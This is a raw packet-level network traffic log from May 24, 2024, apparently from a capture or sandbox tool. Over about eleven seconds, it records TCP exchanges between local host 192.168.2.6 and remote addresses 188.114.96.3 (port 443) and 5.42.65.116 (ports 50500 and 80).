May 24, 2024 00:22:05.782799006 CEST	49721	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:05.782818079 CEST	443	49721	188.114.96.3	192.168.2.6
May 24, 2024 00:22:05.784063101 CEST	49719	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:05.784100056 CEST	443	49719	188.114.96.3	192.168.2.6
May 24, 2024 00:22:05.784382105 CEST	443	49719	188.114.96.3	192.168.2.6
May 24, 2024 00:22:05.785337925 CEST	49720	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:05.785348892 CEST	443	49720	188.114.96.3	192.168.2.6
May 24, 2024 00:22:05.785612106 CEST	443	49720	188.114.96.3	192.168.2.6
May 24, 2024 00:22:05.807888031 CEST	49719	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:05.807924986 CEST	49719	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:05.807979107 CEST	443	49719	188.114.96.3	192.168.2.6
May 24, 2024 00:22:05.809787989 CEST	49720	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:05.809871912 CEST	49720	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:05.809911013 CEST	443	49720	188.114.96.3	192.168.2.6
May 24, 2024 00:22:06.216047049 CEST	443	49720	188.114.96.3	192.168.2.6
May 24, 2024 00:22:06.222182989 CEST	443	49720	188.114.96.3	192.168.2.6
May 24, 2024 00:22:06.222218990 CEST	443	49720	188.114.96.3	192.168.2.6
May 24, 2024 00:22:06.222266912 CEST	443	49720	188.114.96.3	192.168.2.6
May 24, 2024 00:22:06.222306967 CEST	49720	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:06.222326994 CEST	443	49720	188.114.96.3	192.168.2.6
May 24, 2024 00:22:06.222364902 CEST	49720	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:06.239577055 CEST	443	49720	188.114.96.3	192.168.2.6
May 24, 2024 00:22:06.239603043 CEST	443	49720	188.114.96.3	192.168.2.6
May 24, 2024 00:22:06.239701033 CEST	49720	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:06.239717007 CEST	443	49720	188.114.96.3	192.168.2.6
May 24, 2024 00:22:06.239769936 CEST	49720	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:06.249526978 CEST	443	49720	188.114.96.3	192.168.2.6
May 24, 2024 00:22:06.256980896 CEST	443	49720	188.114.96.3	192.168.2.6
May 24, 2024 00:22:06.256999969 CEST	443	49720	188.114.96.3	192.168.2.6
May 24, 2024 00:22:06.257041931 CEST	49720	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:06.257055998 CEST	443	49720	188.114.96.3	192.168.2.6
May 24, 2024 00:22:06.257097960 CEST	49720	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:06.263669968 CEST	443	49720	188.114.96.3	192.168.2.6
May 24, 2024 00:22:06.263761997 CEST	443	49720	188.114.96.3	192.168.2.6
May 24, 2024 00:22:06.263813019 CEST	49720	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:06.264225006 CEST	49720	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:06.264241934 CEST	443	49720	188.114.96.3	192.168.2.6
May 24, 2024 00:22:06.264265060 CEST	49720	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:06.264271021 CEST	443	49720	188.114.96.3	192.168.2.6
May 24, 2024 00:22:06.290657997 CEST	49722	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:06.290692091 CEST	443	49722	188.114.96.3	192.168.2.6
May 24, 2024 00:22:06.290932894 CEST	49722	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:06.291153908 CEST	443	49721	188.114.96.3	192.168.2.6
May 24, 2024 00:22:06.291232109 CEST	49721	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:06.291358948 CEST	49722	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:06.291371107 CEST	443	49722	188.114.96.3	192.168.2.6
May 24, 2024 00:22:06.292442083 CEST	49721	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:06.292447090 CEST	443	49721	188.114.96.3	192.168.2.6
May 24, 2024 00:22:06.292947054 CEST	443	49721	188.114.96.3	192.168.2.6
May 24, 2024 00:22:06.294275999 CEST	49721	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:06.294441938 CEST	49721	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:06.294475079 CEST	443	49721	188.114.96.3	192.168.2.6
May 24, 2024 00:22:06.325629950 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:06.375319004 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:06.375530005 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:06.518342972 CEST	443	49719	188.114.96.3	192.168.2.6
May 24, 2024 00:22:06.520184040 CEST	443	49719	188.114.96.3	192.168.2.6
May 24, 2024 00:22:06.520257950 CEST	49719	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:06.520319939 CEST	443	49719	188.114.96.3	192.168.2.6
May 24, 2024 00:22:06.522205114 CEST	443	49719	188.114.96.3	192.168.2.6
May 24, 2024 00:22:06.522403955 CEST	49719	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:06.522464037 CEST	443	49719	188.114.96.3	192.168.2.6
May 24, 2024 00:22:06.530204058 CEST	443	49719	188.114.96.3	192.168.2.6
May 24, 2024 00:22:06.530226946 CEST	443	49719	188.114.96.3	192.168.2.6
May 24, 2024 00:22:06.530313015 CEST	49719	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:06.530338049 CEST	443	49719	188.114.96.3	192.168.2.6
May 24, 2024 00:22:06.530420065 CEST	49719	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:06.534255028 CEST	443	49719	188.114.96.3	192.168.2.6
May 24, 2024 00:22:06.534291029 CEST	443	49719	188.114.96.3	192.168.2.6
May 24, 2024 00:22:06.534354925 CEST	49719	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:06.534374952 CEST	443	49719	188.114.96.3	192.168.2.6
May 24, 2024 00:22:06.542128086 CEST	443	49719	188.114.96.3	192.168.2.6
May 24, 2024 00:22:06.542150021 CEST	443	49719	188.114.96.3	192.168.2.6
May 24, 2024 00:22:06.542186975 CEST	49719	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:06.542200089 CEST	443	49719	188.114.96.3	192.168.2.6
May 24, 2024 00:22:06.542222977 CEST	443	49719	188.114.96.3	192.168.2.6
May 24, 2024 00:22:06.542259932 CEST	49719	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:06.542289019 CEST	49719	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:06.542843103 CEST	49719	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:06.542872906 CEST	443	49719	188.114.96.3	192.168.2.6
May 24, 2024 00:22:06.685372114 CEST	49723	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:06.685414076 CEST	443	49723	188.114.96.3	192.168.2.6
May 24, 2024 00:22:06.685491085 CEST	49723	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:06.685867071 CEST	49723	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:06.685883045 CEST	443	49723	188.114.96.3	192.168.2.6
May 24, 2024 00:22:06.758001089 CEST	443	49721	188.114.96.3	192.168.2.6
May 24, 2024 00:22:06.758241892 CEST	443	49721	188.114.96.3	192.168.2.6
May 24, 2024 00:22:06.758282900 CEST	49721	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:06.758308887 CEST	49721	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:06.818380117 CEST	443	49722	188.114.96.3	192.168.2.6
May 24, 2024 00:22:06.818447113 CEST	49722	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:06.824188948 CEST	49722	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:06.824212074 CEST	443	49722	188.114.96.3	192.168.2.6
May 24, 2024 00:22:06.824233055 CEST	49724	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:06.824275970 CEST	443	49724	188.114.96.3	192.168.2.6
May 24, 2024 00:22:06.824337006 CEST	49724	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:06.824436903 CEST	443	49722	188.114.96.3	192.168.2.6
May 24, 2024 00:22:06.824727058 CEST	49724	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:06.824743032 CEST	443	49724	188.114.96.3	192.168.2.6
May 24, 2024 00:22:06.826215029 CEST	49722	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:06.826437950 CEST	49722	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:06.826468945 CEST	443	49722	188.114.96.3	192.168.2.6
May 24, 2024 00:22:07.175438881 CEST	443	49723	188.114.96.3	192.168.2.6
May 24, 2024 00:22:07.175515890 CEST	49723	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:07.203603983 CEST	49723	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:07.203630924 CEST	443	49723	188.114.96.3	192.168.2.6
May 24, 2024 00:22:07.203906059 CEST	443	49723	188.114.96.3	192.168.2.6
May 24, 2024 00:22:07.212569952 CEST	49723	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:07.213277102 CEST	49723	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:07.213313103 CEST	443	49723	188.114.96.3	192.168.2.6
May 24, 2024 00:22:07.343456030 CEST	443	49724	188.114.96.3	192.168.2.6
May 24, 2024 00:22:07.343538046 CEST	49724	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:07.351070881 CEST	49724	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:07.351089001 CEST	443	49724	188.114.96.3	192.168.2.6
May 24, 2024 00:22:07.351979971 CEST	443	49724	188.114.96.3	192.168.2.6
May 24, 2024 00:22:07.353509903 CEST	49724	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:07.353843927 CEST	49724	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:07.353895903 CEST	443	49724	188.114.96.3	192.168.2.6
May 24, 2024 00:22:07.353956938 CEST	49724	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:07.353964090 CEST	443	49724	188.114.96.3	192.168.2.6
May 24, 2024 00:22:08.097048044 CEST	443	49723	188.114.96.3	192.168.2.6
May 24, 2024 00:22:08.097163916 CEST	443	49723	188.114.96.3	192.168.2.6
May 24, 2024 00:22:08.097373009 CEST	49723	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:08.102937937 CEST	49723	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:08.102962017 CEST	443	49723	188.114.96.3	192.168.2.6
May 24, 2024 00:22:08.244071007 CEST	443	49722	188.114.96.3	192.168.2.6
May 24, 2024 00:22:08.244175911 CEST	443	49722	188.114.96.3	192.168.2.6
May 24, 2024 00:22:08.244231939 CEST	49722	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:08.256484032 CEST	443	49724	188.114.96.3	192.168.2.6
May 24, 2024 00:22:08.256773949 CEST	443	49724	188.114.96.3	192.168.2.6
May 24, 2024 00:22:08.256859064 CEST	49724	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:09.433924913 CEST	49724	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:09.433962107 CEST	443	49724	188.114.96.3	192.168.2.6
May 24, 2024 00:22:09.677088976 CEST	49726	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:09.677136898 CEST	443	49726	188.114.96.3	192.168.2.6
May 24, 2024 00:22:09.677196980 CEST	49726	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:09.677485943 CEST	49726	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:09.677501917 CEST	443	49726	188.114.96.3	192.168.2.6
May 24, 2024 00:22:09.742147923 CEST	49722	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:09.742182970 CEST	443	49722	188.114.96.3	192.168.2.6
May 24, 2024 00:22:09.774282932 CEST	49729	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:09.774327993 CEST	443	49729	188.114.96.3	192.168.2.6
May 24, 2024 00:22:09.774400949 CEST	49729	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:09.774729967 CEST	49729	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:09.774765968 CEST	443	49729	188.114.96.3	192.168.2.6
May 24, 2024 00:22:10.181468010 CEST	443	49726	188.114.96.3	192.168.2.6
May 24, 2024 00:22:10.181607008 CEST	49726	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:10.182842016 CEST	49726	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:10.182849884 CEST	443	49726	188.114.96.3	192.168.2.6
May 24, 2024 00:22:10.183178902 CEST	443	49726	188.114.96.3	192.168.2.6
May 24, 2024 00:22:10.184211016 CEST	49726	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:10.184350967 CEST	49726	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:10.184386015 CEST	443	49726	188.114.96.3	192.168.2.6
May 24, 2024 00:22:10.184457064 CEST	49726	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:10.184463978 CEST	443	49726	188.114.96.3	192.168.2.6
May 24, 2024 00:22:10.265995979 CEST	443	49729	188.114.96.3	192.168.2.6
May 24, 2024 00:22:10.266088009 CEST	49729	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:10.267438889 CEST	49729	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:10.267497063 CEST	443	49729	188.114.96.3	192.168.2.6
May 24, 2024 00:22:10.267811060 CEST	443	49729	188.114.96.3	192.168.2.6
May 24, 2024 00:22:10.269244909 CEST	49729	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:10.269372940 CEST	49729	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:10.269414902 CEST	443	49729	188.114.96.3	192.168.2.6
May 24, 2024 00:22:10.269474983 CEST	49729	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:10.269491911 CEST	443	49729	188.114.96.3	192.168.2.6
May 24, 2024 00:22:10.744224072 CEST	443	49729	188.114.96.3	192.168.2.6
May 24, 2024 00:22:10.744330883 CEST	443	49729	188.114.96.3	192.168.2.6
May 24, 2024 00:22:10.744540930 CEST	49729	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:10.842289925 CEST	49729	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:10.842355013 CEST	443	49729	188.114.96.3	192.168.2.6
May 24, 2024 00:22:10.982076883 CEST	49732	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:10.982131004 CEST	443	49732	188.114.96.3	192.168.2.6
May 24, 2024 00:22:10.982218981 CEST	49732	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:10.983112097 CEST	49732	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:10.983150959 CEST	443	49732	188.114.96.3	192.168.2.6
May 24, 2024 00:22:11.254209042 CEST	49714	80	192.168.2.6	5.42.65.116
May 24, 2024 00:22:11.476747036 CEST	443	49732	188.114.96.3	192.168.2.6
May 24, 2024 00:22:11.476814985 CEST	49732	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:11.493944883 CEST	49732	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:11.493993998 CEST	443	49732	188.114.96.3	192.168.2.6
May 24, 2024 00:22:11.494246960 CEST	443	49732	188.114.96.3	192.168.2.6
May 24, 2024 00:22:11.512295008 CEST	49732	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:11.512444973 CEST	49732	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:11.512489080 CEST	443	49732	188.114.96.3	192.168.2.6
May 24, 2024 00:22:11.512562990 CEST	49732	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:11.512582064 CEST	443	49732	188.114.96.3	192.168.2.6
May 24, 2024 00:22:12.003102064 CEST	443	49732	188.114.96.3	192.168.2.6
May 24, 2024 00:22:12.003216028 CEST	443	49732	188.114.96.3	192.168.2.6
May 24, 2024 00:22:12.003578901 CEST	49732	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:12.003727913 CEST	49732	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:12.075316906 CEST	49734	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:12.075367928 CEST	443	49734	188.114.96.3	192.168.2.6
May 24, 2024 00:22:12.075470924 CEST	49734	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:12.085166931 CEST	49734	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:12.085179090 CEST	443	49734	188.114.96.3	192.168.2.6
May 24, 2024 00:22:12.591595888 CEST	443	49734	188.114.96.3	192.168.2.6
May 24, 2024 00:22:12.591840029 CEST	49734	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:12.593214035 CEST	49734	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:12.593231916 CEST	443	49734	188.114.96.3	192.168.2.6
May 24, 2024 00:22:12.593502045 CEST	443	49734	188.114.96.3	192.168.2.6
May 24, 2024 00:22:12.602435112 CEST	49734	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:12.602435112 CEST	49734	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:12.602499962 CEST	443	49734	188.114.96.3	192.168.2.6
May 24, 2024 00:22:13.703346014 CEST	49736	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:13.703387022 CEST	443	49736	188.114.96.3	192.168.2.6
May 24, 2024 00:22:13.703989029 CEST	49736	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:13.704960108 CEST	49736	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:13.704978943 CEST	443	49736	188.114.96.3	192.168.2.6
May 24, 2024 00:22:14.177206039 CEST	443	49736	188.114.96.3	192.168.2.6
May 24, 2024 00:22:14.177326918 CEST	49736	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:14.178786039 CEST	49736	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:14.178793907 CEST	443	49736	188.114.96.3	192.168.2.6
May 24, 2024 00:22:14.179025888 CEST	443	49736	188.114.96.3	192.168.2.6
May 24, 2024 00:22:14.228912115 CEST	49736	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:14.228981018 CEST	49736	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:14.229021072 CEST	443	49736	188.114.96.3	192.168.2.6
May 24, 2024 00:22:14.437306881 CEST	443	49734	188.114.96.3	192.168.2.6
May 24, 2024 00:22:14.437422037 CEST	443	49734	188.114.96.3	192.168.2.6
May 24, 2024 00:22:14.437581062 CEST	49734	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:14.437654972 CEST	49734	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:14.451585054 CEST	49737	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:14.451627016 CEST	443	49737	188.114.96.3	192.168.2.6
May 24, 2024 00:22:14.452008963 CEST	49737	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:14.452008963 CEST	49737	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:14.452054024 CEST	443	49737	188.114.96.3	192.168.2.6
May 24, 2024 00:22:14.588862896 CEST	443	49726	188.114.96.3	192.168.2.6
May 24, 2024 00:22:14.589102983 CEST	443	49726	188.114.96.3	192.168.2.6
May 24, 2024 00:22:14.589230061 CEST	49726	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:14.589363098 CEST	49726	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:14.642538071 CEST	49738	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:14.642561913 CEST	443	49738	188.114.96.3	192.168.2.6
May 24, 2024 00:22:14.645548105 CEST	49738	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:14.645862103 CEST	49738	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:14.645879984 CEST	443	49738	188.114.96.3	192.168.2.6
May 24, 2024 00:22:14.908082962 CEST	443	49736	188.114.96.3	192.168.2.6
May 24, 2024 00:22:14.908195972 CEST	443	49736	188.114.96.3	192.168.2.6
May 24, 2024 00:22:14.908252001 CEST	49736	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:14.908705950 CEST	49736	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:14.908723116 CEST	443	49736	188.114.96.3	192.168.2.6
May 24, 2024 00:22:14.908744097 CEST	49736	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:14.908749104 CEST	443	49736	188.114.96.3	192.168.2.6
May 24, 2024 00:22:14.911986113 CEST	49739	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:14.912009001 CEST	443	49739	188.114.96.3	192.168.2.6
May 24, 2024 00:22:14.912070990 CEST	49739	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:14.912811041 CEST	49739	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:14.912827015 CEST	443	49739	188.114.96.3	192.168.2.6
May 24, 2024 00:22:14.982180119 CEST	443	49737	188.114.96.3	192.168.2.6
May 24, 2024 00:22:14.982253075 CEST	49737	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:14.983740091 CEST	49737	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:14.983748913 CEST	443	49737	188.114.96.3	192.168.2.6
May 24, 2024 00:22:14.983985901 CEST	443	49737	188.114.96.3	192.168.2.6
May 24, 2024 00:22:14.985019922 CEST	49737	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:14.985178947 CEST	49737	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:14.985187054 CEST	443	49737	188.114.96.3	192.168.2.6
May 24, 2024 00:22:15.119237900 CEST	443	49738	188.114.96.3	192.168.2.6
May 24, 2024 00:22:15.119400978 CEST	49738	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:15.135330915 CEST	49738	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:15.135365009 CEST	443	49738	188.114.96.3	192.168.2.6
May 24, 2024 00:22:15.136251926 CEST	443	49738	188.114.96.3	192.168.2.6
May 24, 2024 00:22:15.185996056 CEST	49738	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:15.186197042 CEST	49738	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:15.186243057 CEST	443	49738	188.114.96.3	192.168.2.6
May 24, 2024 00:22:15.391473055 CEST	443	49737	188.114.96.3	192.168.2.6
May 24, 2024 00:22:15.391571999 CEST	443	49737	188.114.96.3	192.168.2.6
May 24, 2024 00:22:15.391710043 CEST	49737	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:15.391993999 CEST	49737	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:15.392010927 CEST	443	49737	188.114.96.3	192.168.2.6
May 24, 2024 00:22:15.403212070 CEST	443	49739	188.114.96.3	192.168.2.6
May 24, 2024 00:22:15.403270006 CEST	49739	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:15.404577017 CEST	49739	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:15.404586077 CEST	443	49739	188.114.96.3	192.168.2.6
May 24, 2024 00:22:15.404817104 CEST	443	49739	188.114.96.3	192.168.2.6
May 24, 2024 00:22:15.406137943 CEST	49739	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:15.406162024 CEST	49739	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:15.406204939 CEST	443	49739	188.114.96.3	192.168.2.6
May 24, 2024 00:22:15.592401028 CEST	443	49738	188.114.96.3	192.168.2.6
May 24, 2024 00:22:15.592521906 CEST	443	49738	188.114.96.3	192.168.2.6
May 24, 2024 00:22:15.592572927 CEST	49738	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:15.592659950 CEST	49738	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:15.592677116 CEST	443	49738	188.114.96.3	192.168.2.6
May 24, 2024 00:22:15.605813026 CEST	49740	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:15.605907917 CEST	443	49740	188.114.96.3	192.168.2.6
May 24, 2024 00:22:15.606026888 CEST	49740	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:15.606324911 CEST	49740	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:15.606360912 CEST	443	49740	188.114.96.3	192.168.2.6
May 24, 2024 00:22:15.797180891 CEST	49741	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:15.797276974 CEST	443	49741	188.114.96.3	192.168.2.6
May 24, 2024 00:22:15.797462940 CEST	49741	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:15.797813892 CEST	49741	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:15.797837019 CEST	443	49741	188.114.96.3	192.168.2.6
May 24, 2024 00:22:16.089200974 CEST	443	49740	188.114.96.3	192.168.2.6
May 24, 2024 00:22:16.089262009 CEST	49740	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:16.090627909 CEST	49740	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:16.090636015 CEST	443	49740	188.114.96.3	192.168.2.6
May 24, 2024 00:22:16.090945959 CEST	443	49740	188.114.96.3	192.168.2.6
May 24, 2024 00:22:16.092446089 CEST	49740	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:16.092561960 CEST	49740	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:16.092566013 CEST	443	49740	188.114.96.3	192.168.2.6
May 24, 2024 00:22:16.130846024 CEST	443	49739	188.114.96.3	192.168.2.6
May 24, 2024 00:22:16.136975050 CEST	443	49739	188.114.96.3	192.168.2.6
May 24, 2024 00:22:16.137000084 CEST	443	49739	188.114.96.3	192.168.2.6
May 24, 2024 00:22:16.137062073 CEST	443	49739	188.114.96.3	192.168.2.6
May 24, 2024 00:22:16.137072086 CEST	49739	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:16.137088060 CEST	443	49739	188.114.96.3	192.168.2.6
May 24, 2024 00:22:16.137114048 CEST	49739	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:16.141576052 CEST	443	49739	188.114.96.3	192.168.2.6
May 24, 2024 00:22:16.141697884 CEST	49739	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:16.141706944 CEST	443	49739	188.114.96.3	192.168.2.6
May 24, 2024 00:22:16.154630899 CEST	443	49739	188.114.96.3	192.168.2.6
May 24, 2024 00:22:16.154654980 CEST	443	49739	188.114.96.3	192.168.2.6
May 24, 2024 00:22:16.154721022 CEST	49739	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:16.154731035 CEST	443	49739	188.114.96.3	192.168.2.6
May 24, 2024 00:22:16.154805899 CEST	49739	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:16.161314964 CEST	443	49739	188.114.96.3	192.168.2.6
May 24, 2024 00:22:16.161391020 CEST	443	49739	188.114.96.3	192.168.2.6
May 24, 2024 00:22:16.161453962 CEST	49739	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:16.161463022 CEST	443	49739	188.114.96.3	192.168.2.6
May 24, 2024 00:22:16.161508083 CEST	443	49739	188.114.96.3	192.168.2.6
May 24, 2024 00:22:16.161546946 CEST	49739	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:16.161679029 CEST	49739	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:16.161698103 CEST	443	49739	188.114.96.3	192.168.2.6
May 24, 2024 00:22:16.161709070 CEST	49739	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:16.161714077 CEST	443	49739	188.114.96.3	192.168.2.6
May 24, 2024 00:22:16.186866045 CEST	49742	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:16.186892986 CEST	443	49742	188.114.96.3	192.168.2.6
May 24, 2024 00:22:16.187043905 CEST	49742	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:16.187311888 CEST	49742	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:16.187321901 CEST	443	49742	188.114.96.3	192.168.2.6
May 24, 2024 00:22:16.315768003 CEST	443	49741	188.114.96.3	192.168.2.6
May 24, 2024 00:22:16.315829992 CEST	49741	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:16.317229033 CEST	49741	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:16.317234039 CEST	443	49741	188.114.96.3	192.168.2.6
May 24, 2024 00:22:16.317451000 CEST	443	49741	188.114.96.3	192.168.2.6
May 24, 2024 00:22:16.318686962 CEST	49741	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:16.319621086 CEST	49741	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:16.319638014 CEST	443	49741	188.114.96.3	192.168.2.6
May 24, 2024 00:22:16.319760084 CEST	49741	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:16.319777012 CEST	443	49741	188.114.96.3	192.168.2.6
May 24, 2024 00:22:16.319880009 CEST	49741	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:16.319897890 CEST	443	49741	188.114.96.3	192.168.2.6
May 24, 2024 00:22:16.320023060 CEST	49741	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:16.320036888 CEST	443	49741	188.114.96.3	192.168.2.6
May 24, 2024 00:22:16.320178032 CEST	49741	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:16.320194006 CEST	443	49741	188.114.96.3	192.168.2.6
May 24, 2024 00:22:16.320338964 CEST	49741	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:16.320353985 CEST	443	49741	188.114.96.3	192.168.2.6
May 24, 2024 00:22:16.320364952 CEST	49741	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:16.320485115 CEST	49741	443	192.168.2.6	188.114.96.3
